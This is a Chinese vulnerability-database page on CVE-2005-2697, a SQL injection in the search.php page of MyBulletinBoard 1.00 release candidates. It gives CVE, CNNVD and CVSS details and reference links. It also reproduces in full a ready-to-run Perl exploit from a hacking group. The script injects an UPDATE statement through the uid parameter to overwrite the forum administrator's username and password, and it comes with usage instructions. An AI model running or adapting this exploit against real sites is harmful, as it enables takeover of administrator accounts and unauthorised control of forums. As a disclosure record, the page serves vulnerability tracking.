MyBulletinBoard ‘search.php’ SQL注入漏洞

MyBulletinBoard ‘search.php’ SQL注入漏洞

漏洞ID 1109020 漏洞类型 SQL注入
发布时间 2005-08-22 更新时间 2005-10-25
图片[1]-MyBulletinBoard ‘search.php’ SQL注入漏洞-安全小百科CVE编号 CVE-2005-2697
图片[2]-MyBulletinBoard ‘search.php’ SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200508-291
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1172
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-291
|漏洞详情
MyBulletinBoard(MyBB)1.00发布候选版1至4中的search.php页面存在SQL注入漏洞。这使得远程攻击者可以借助于uid参数执行任意SQL命令。
|漏洞EXP
# mybb is dead /str0ke

#!/usr/bin/perl
######################################################################################
#                              Crouz.Com Security Team                               #
######################################################################################
#    EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability             #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (sirius)                                #
#Email: [email protected]                                               #
#                                                                                    #
#This Xpl Change Admin's Pass For L0gin With P0wer User                              #
#                                                                                    #
#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln      #
#                                                                                    #
######################################################################################
# GR33tz T0 ==>  mh_p0rtal  --  Dr-CephaleX  --  The-Cephexin  -- Djay_Agoustinno    #
#               No_Face_King --  Behzad185 -- Autumn_Love6(Hey Man You Are Singular) #
#                                                                                    #
#   Special Lamerz : Hoormazd  &  imm02tal  :P  ++ xshabgardx                        #
######################################################################################

use IO::Socket;

if (@ARGV < 2)
{
  print "n==========================================n";
  print " n     -- Exploit By Alpha Programmer(sirius) --nn";
  print "              Crouz Security Team      nn";
  print "         Usage: <T4rg3t> <DIR>nn"; 
  print "==========================================nn";
  print "Examples:nn";
  print "    Mybb.pl www.Site.com /mybb/ n";
  exit();

}
my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "C0nn3ctedn";
$http = "GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0n";
$http .= "Host: $hostnnnn";
print "n";
print $remote $http;
print "Wait For Changing Password ...n";
sleep(10);
print "OK , Now Login With :n";
print "Username: crouzn";
print "Password: crouznn";
print "Enjoy ;)nn";

# milw0rm.com [2005-08-22]
|参考资料

来源:SECUNIA
名称:13722
链接:http://secunia.com/advisories/13722/
来源:BUGTRAQ
名称:20050819VulinMyBB
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112448791006470&w;=2
来源:BID
名称:14615
链接:http://www.securityfocus.com/bid/14615

相关推荐: Half-Life ClanMod 1.80/1.81 Plugin – Remote Format String

Half-Life ClanMod 1.80/1.81 Plugin – Remote Format String 漏洞ID 1053681 漏洞类型 发布时间 2003-01-10 更新时间 2003-01-10 CVE编号 N/A CNNVD-ID N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享